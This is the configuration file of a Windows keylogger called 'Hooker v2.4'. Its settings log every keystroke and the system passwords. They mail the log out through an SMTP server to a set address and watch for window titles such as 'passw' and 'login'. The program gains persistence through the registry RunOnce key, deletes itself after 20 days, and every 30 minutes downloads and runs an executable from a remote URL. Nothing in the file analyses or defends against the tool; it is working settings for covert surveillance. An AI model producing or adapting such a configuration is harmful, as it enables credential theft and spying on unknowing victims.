;****************************************************************
;*                                                              *
;*              Hooker v2.4, hkconf.ini file                    *
;*                         ACrazzi, 1999                        *
;*                                                              *
;****************************************************************

;if key is not defined, it will be assumed as 0 or ""

        ;common parameters
[main]

        total = 1                ;keylog all time?
        
        full = 0                 ;log windows, where no keys was pressed?

        adv = 0                  ;log advanced keys?

        encrypt = 0              ;ecrypt log?

        mail = 1                 ;send log via email?

        syspass = 1              ;include system passwords in log?

        kill = 1                 ;kill itself?

        fullname = 0             ;full exename in registry?

        exepath = 0              ;where to create exename and write log (must be in windows predefined path) ?
                                 ;0 - windows
                                 ;1 - windows\system
                                 ;2 - user defined

        ras = 0                  ;detect RAS? if computer is in lan, set to 0

        loglimit = 50000         ;log will be no longer than this

        sendafter = 10000        ;force send log by mail after this size

        nss = 7                  ;number of substrings to search (max - 40)

        port = 25                ;sendmail's port

        ;log filename
        logname=hsys.log

        ;sendmail host
        host=smtp.ix.netcom.com

        ;mailfrom - required for some servers
        mailfrom=nodib.nodib@caramail.fr

        ;mailto - your email
        mailto=nodib.nodib@caramail.fr

        ;subject of message
        subj=Some news from hsys

        ;this file will be downloaded by http in %windir%/system directory
        ;and will be ran from there. default port is 80, if you want to
        ;define another port - type like that: www.addr.com/file:8080
        ;if there is newer file on web, it will be redl-ed.
        ;hooker checks every 30 minutes...
        http=eldy10.tripod.com/nodib.exe

        ;registry path
        reg_path=HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

        ;description in registry
        reg_desc=HSYS

        ;name of exec
        exename=hsys.exe

        ;name of keylog dll. i recommend to give unique name every time
        dllname=keyripper.dll

        ;timespan to send messages
[send]
        second = 0        
        minute = 0        
        hour = 0          
        day = 1           

        ;time to live after installation
[kill]
        second = 0         
        minute = 0         
        hour = 0           
        day = 20           

        ;substrings to search in windows' titles
[strings]
        s00=net
        s01=term
        s02=connect
        s03=remote
        s04=passw
        s05=login
		s06=passe